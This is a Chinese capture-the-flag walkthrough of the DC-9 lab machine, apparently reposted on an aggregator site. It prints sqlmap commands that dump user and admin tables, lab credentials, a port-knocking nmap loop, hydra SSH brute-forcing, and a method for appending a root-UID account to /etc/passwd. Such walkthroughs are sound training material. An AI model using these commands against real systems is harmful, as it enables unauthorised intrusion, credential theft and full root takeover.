小H靶场笔记:DC-9

这篇具有很好参考价值的文章主要介绍了小H靶场笔记:DC-9。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

DC-9

January 10, 2024 10:02 AM
Tags:knockd
Owner:只惠摸鱼

信息收集

  • 使用arp-scan和nmap扫描C段存活主机,探测靶机ip:192.168.199.139,只有80端口开放。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 再扫一下靶机端口服务的情况吧。发现22端口是被过滤的状态,可能装的有防火墙。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 扫描80开放端口的服务、版本、操作系统、基础漏洞。发现有CSRF漏洞,还有一些隐藏的目录探测处但没什么太多有用的信息,还有操作系统的一些信息。一会尝试看一下能否利用。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 访问一下80端口看看什么样,有没有有用的信息

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • Display All Records这里是用户的一个信息展示,可以看到有17个用户,且有相应的职位信息,邮箱。一会可以作为提权或登陆的依据。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • search页面有一个查询框,因为是查询前面用户的,在页面尝试了一下SQL注入和XSS没用。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 发现manage.php有登陆页面,尝试弱密码、万能密码没有什么用

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 扫了一下后台目录,也没有什么发现

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 指纹识别一下,也没有发现什么有用的东西。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 爆破了一下manage.php页面的登录,没有成功

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 用BP抓包再试一下sql注入吧,在manage.php页面进行没有什么效果,但是在search页面有用!(有突破口了!)

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 上sqlmap,直接跑吧

    • 爆数据库

      • sqlmap -u http://192.168.199.139/results.php --data “search=1” --dbs

        小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    • 拿到数据库,其中users感觉比较有用,爆一下表

      • sqlmap -u http://192.168.199.139/results.php --data “search=1” -D “users” --tables

        小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    • 拿到一个表,UserDetails,爆一下字段名

      • sqlmap -u http://192.168.199.139/results.php --data “search=1” -D “users” -T “UserDetails” --columns

        小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    • 我们直接爆firstname,lastname,username,password的数据

      • sqlmap -u http://192.168.199.139/results.php --data “search=1” -D “users” -T “UserDetails” -C “firstname,lastname,username,password” --dump

        小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 根据之前用户信息记录页面中所看到的信息,marym用户是CEO的用户,应该相对权限较高一些,拿他的账号登录一下。marym 3kfs86sfd,尝试manage页面不行,又尝试了其他管理员账号也统统不行,ssh是过滤的无法链接,那只有再看看其他的数据库了。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 爆一下数据库Staff的表

    • sqlmap -u http://192.168.199.139/results.php --data “search=1” -D “Staff” --tables

      小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 爆一下Users表的字段名

    • sqlmap -u http://192.168.199.139/results.php --data “search=1” -D “Staff” -T “Users” --columns

      小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 爆一下Password和Username字段的数据

    • sqlmap -u http://192.168.199.139/results.php --data “search=1” -D “Staff” -T “Users” -C “Username,Password” --dump

      小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 爆出一个admin账号密码,但密码好像是md5加密的,去找一些在线解密网站解一下。得到密码transorbital1

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 再次尝试登录,成功登录!

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 发现页面下方有一个file does not exist, 翻到Manage前面的页面就没有,可能存在文件包含漏洞。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 尝试一下查一下用户,不断试一下目录(),发现可以爆出目录,确定存在文件包含漏洞。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

漏洞利用

  • 想起dc-5的时候,文件包含漏洞使用了nginx的日志来保存一句话木马,从而蚁剑连接到后端,指纹识别的时候发现是apache2.4.38版本,查了一下相关路径,尝试了/var/log/httpd/、/var/log/apache2/、/var/log/apache/ 都不行。没办法上传一句话木马想想其他办法吧。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 想想之前被扫出来的被过滤的ssh端口,以及users数据库中未使用过的用户密码信息,搜一搜ssh被过滤,找到一篇这样的文章https://cloud.tencent.com/developer/article/1782065

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 感觉可能也是使用了Knockd进行了隐藏,查看一下knockd的配置文件是否存在。经过不断尝试,发现存在knockd。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 通过之前那篇文章学到了knockd如何配置的,我们进行一个反利用,它“关门”,我们“敲开门”

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 用nmap进行敲门

    • for x in 7469 8475 9842;do nmap ‐Pn ‐‐max‐retries 0 ‐p $x 192.168.199.139;done

      小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 查看22端口是否开放了,成功“敲开“

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 之前收集的有一些用户名和密码,保存到txt文档:users.txt pass.txt,使用hydra对ssh进行爆破。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    • hydra -L users.txt -P pass.txt 192.168.199.139 ssh

      小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 爆出了一个,尝试连接,成功拿到shell

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

提权

  • 看一下SUID文件和sudo(无需密码)的文件,权限太低,且没有什么能用的SUID文件

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 看一下用户目录吧,是否能够获得切换到其他用户的信息,发现只能进入本用户的文件内,其他没权限,且本用户的文件夹中没有文件。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 查看一下用户目录下有没有隐藏目录或文件存在

    • ls -al

      小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    • 还真有

  • 看一下secrets(感觉就是不想被人发现的东西)

    • 看起来好像是其他用户的password

      小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 存pass.txt 字典里,准备再次爆破一遍

小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 新爆出了两个账户fredf、joeyt,查看之前数据库中的信息,再对比记录表,可以知道fredf是管理员,那就用他的账号一试。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 查一下SUID文件和无需密码的sudo文件

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 找到这个文件,运行一下,给了一个使用提示,需要python test.py读取追加

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • find / -name “test.py” 2>/dev/null (2>/dev/null 代表忽略掉错误提示信息)

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 读一下文件内容:读取参数1的内容,然后将参数1的内容写入到参数2的内容中。

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

    • 那我们可以写一个有root权限的账户到/etc/passwd
  • 进行一个密码加密(/etc/passwd密码直接以明文写进去,登录不成功)

    openssl passwd -1 -salt demo 123
    
    -1 使用md5加密算法
    -salt 自动插入一个随机数作为文件内容加密
    demo 123 用户名和密码
    

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 参数1写追加的文件内容(即按/etc/passwd格式写好的root权限的账户),参数2写/etc/passwd

    • echo ‘demo: 1 1 1demo$N8rNOM51XVLc6Sj7cqsmT/:0:0::/root:/bin/bash’ >> /tmp/passwd

      用户名:密码:uid:gid:家目录:登陆后使用的shell(注意使用两个/root前有两个::这个代表的是这一个参数为空【用户的简单说明。可为空】)

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 按文件用法执行,添加root权限新用户:demo 123

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • su demo 切换到root权限用户

    小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全

  • 提权成功!查看flag。

  • 小H靶场笔记:DC-9,靶场笔记,笔记,网络,web安全,安全,网络安全文章来源地址https://www.toymoban.com/news/detail-819683.html

到了这里,关于小H靶场笔记:DC-9的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【安全学习】-网络安全靶场实训演练系统建设方案

    第1章需求分析 1.1建设需求 1.2建设目标与内容 第2章系统整体建设 2.1设计思想 2.2建设目标 2.3架构设计 2.4系统设计 2.4.1基础平台系统设计 2.4.2实训分系统设计 2.4.3考核分系统设计 2.4.4拓扑设计分系统设计 2.4.5模拟仿真系统设计 2.4.5.1网络仿真 2.4.5.2安全仿真 2.4.5.3系统监控 2.

    2024年02月03日
    浏览(42)
  • 16个网络安全常用的练习靶场(小白必备)

    DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 链接地址:http://www.dvwa.co.uk mutillidaemutillidae是一个免费,开源的Web应用程序,提供专门被允许的安全测试和入侵的Web应用程序。它是由Adrian “Ironge

    2024年02月02日
    浏览(58)
  • 【网络安全】DVWA靶场实战&BurpSuite内网渗透

    我们先来认识一下BurpSuite中有哪些攻击模式,然后开始实战操作 下面攻击案例即将使用,对单个参数进行攻击破解 联想战争中狙击手的作用,一次只能击杀一名敌人 联想古代的攻城锤,特点就是攻击范围比狙击手大,但是效率不一定高 可以设置多个攻击字段,但是payload值

    2024年02月13日
    浏览(51)
  • 【网络安全 --- 文件上传靶场练习】文件上传靶场安装以及1-5关闯关思路及技巧,源码分析

      首先分享一个自己做的很不错的网路安全笔记,内容详细介绍了许多知识 超详细的网络安全笔记 分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记​编辑https://m.tb.cn/h.5JdFcih?tk=OuVrWRl9vMx%20CZ3457 若已安装,请

    2024年02月06日
    浏览(47)
  • 如何利用在线网络靶场将安全提升至新水平

    在 Standoff 365 的在线网络靶场中,任何公司都可以试验信息安全手段和企业网络设置,优化攻击检测、响应和事件调查的技能。 2023 年,我们不仅准许攻击者使用,也准许防御者使用。我们可以根据客户要求轻松部署 10 个细分行业中的任一行业,或帮助公司重建他们自己

    2024年01月20日
    浏览(50)
  • [网络安全]upload-labs 本地靶场搭建详细教程

    本文以phpstudy搭建upload-labs本地靶场环境 PhpStudy是一个PHP调试环境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安装后无须配置即可使用。 官网安装地址: PhpStudy Download 链接 安装完成后打开PhpStudy 网站配置如下: upload-labs 靶机下载地址: https://github.co

    2024年02月08日
    浏览(60)
  • [网络安全]xss-labs 本地靶场搭建详细教程

    本文以phpstudy搭建xss-labs本地靶场环境 PhpStudy是一个PHP调试环境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安装后无须配置即可使用。 官网安装地址: PhpStudy Download 链接 安装完成后打开PhpStudy 网站配置如下: xss-labs 靶机下载地址: https://github.com/do0d

    2024年02月08日
    浏览(37)
  • 网络安全全栈培训笔记(WEB攻防-51-WEB攻防-通用漏洞&验证码识别&复用&调用&找回密码重定向&状态值)

    知识点: 1、找回密码逻辑机制-回显验证码指向 2、验证码验证安全机制-爆破复用识别 3、找回密码客户端回显Response状态值修改重定向 4、验证码技术验证码爆破,验证码复用,验证码识别等 详细点: 找回密码流程安全: 1、用回显状态判断-res前端判断不安全 2、用用户名重

    2024年01月16日
    浏览(62)
  • 网络安全技术新手入门:在docker上安装dvwa靶场

    准备工作:1.已经安装好kali linux 步骤总览:1.安装好docker     2.拖取镜像,安装dvwa 输入命令: sudo su 输入命令: curl  -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - 输入命令: echo \\\'deb https://download.docker.com/linux/debian stretch stable\\\' /etc/apt/sources.list.d/docker.list tips:此处

    2024年01月20日
    浏览(37)
  • 网络安全全栈培训笔记(53-WEB攻防-通用漏洞&CRLF注入&URL重定向&资源处理拒绝服务)

    知识点: 1、CRLF注入-原理检测利用 2、URL重定向-原理检测利用 3、Web拒绝服务-原理检测利用 #下节预告: 1、JSONPCORS跨域 2、域名安全接管劫持 #详细点: 1.CRLF注入漏洞,是因为Wb应用没有对用户输入做严格验证,导致攻击者可以输入一些 恶意字符。攻击者一旦向清求行或首部

    2024年01月15日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包